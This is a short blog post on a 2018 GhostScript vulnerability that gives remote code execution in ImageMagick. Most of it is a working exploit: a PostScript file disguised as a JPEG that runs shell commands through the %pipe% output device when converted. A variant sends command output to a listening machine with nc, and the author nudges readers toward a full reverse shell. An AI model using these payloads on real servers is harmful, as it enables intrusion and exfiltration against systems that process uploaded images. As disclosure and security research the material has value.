ImageMagic RCE

Numb Shiva
Aug 22, 2018 · 1 min read

Overnight @taviso dropped a few vulnerabilities in GhostScript, including one that will cause code execution in ImageMagick.

Link to the bug report in Project Zero.

ImageMagick is not shy when it comes to the amount of vulnerabilities disclosed, with over 40 in 2018, and who can forget the marketing around ‘ImageTragick’?

The ImageMagick code execution caught my eye, mostly because it is widely used on web servers, it seemed fairly trivial to exploit, and seemed to show the most promise in turning to a remote code execution.

The PoC provided by Tavis is fairly easy to break down, with the part highlighted responsible for executing the code (Ubuntu Poc):

$ cat shellexec.jpeg%!PS
userdict /setpagedevice undef
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

Running convert on the above file will execute the ‘id’ command, returning the id of the user that ran convert.

convert shellexec.jpg blah.gif
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)

Quick and nasty testing showed that this could indeed be used to force a system to connect to another machine:

mark /OutputFile (%pipe%echo `id` | nc 1337) currentdevice putdeviceprops


$ nc -lvvp 1337                 
Listening on [] (family 0, port 1337)
Connection from localhost 55068 received!
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),118(lpadmin),128(sambashare)

Success! Command execution through to a ‘remote’ system. Modify payloads accordingly and you’ll have a ‘proper’ reverse shell ;)

Happy hacking.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store